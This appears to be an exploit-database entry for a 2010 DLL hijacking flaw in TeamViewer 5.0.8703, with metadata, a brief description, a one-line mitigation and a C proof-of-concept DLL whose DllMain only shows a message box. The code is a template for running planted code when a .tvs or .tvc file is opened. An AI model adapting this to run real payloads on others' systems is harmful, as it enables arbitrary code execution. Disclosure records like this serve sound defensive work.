header-logo
Suggest Exploit
vendor:
TeamViewer
by:
Glafkos Charalambous
7,8
CVSS
HIGH
DLL Hijacking
427
CWE
Product Name: TeamViewer
Affected Version From: 5.0.8703
Affected Version To: 5.0.8703
Patch Exists: YES
Related CWE: N/A
CPE: a:teamviewer:teamviewer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)

This exploit is a DLL hijacking vulnerability in TeamViewer version 5.0.8703. It allows an attacker to execute arbitrary code on the vulnerable system by placing a malicious DLL in the same directory as the vulnerable application. The vulnerable extensions are .tvs and .tvc.

Mitigation:

Ensure that all applications are up to date and that all vulnerable extensions are blocked.
Source

Exploit-DB raw data:

/* 
Exploit Title: TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: 5.0.8703
Tested on: Windows XP SP3 En
Vulnerable extensions: .tvs .tvc
Greetz: Astalavista, OffSEC, Exploit-DB
*/

#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
  dll_hijack();
  return 0;
}

int dll_hijack()
{
  MessageBox(0, "TeamViewer DLL Hijacking!", "DLL Message", MB_OK);
  return 0;
}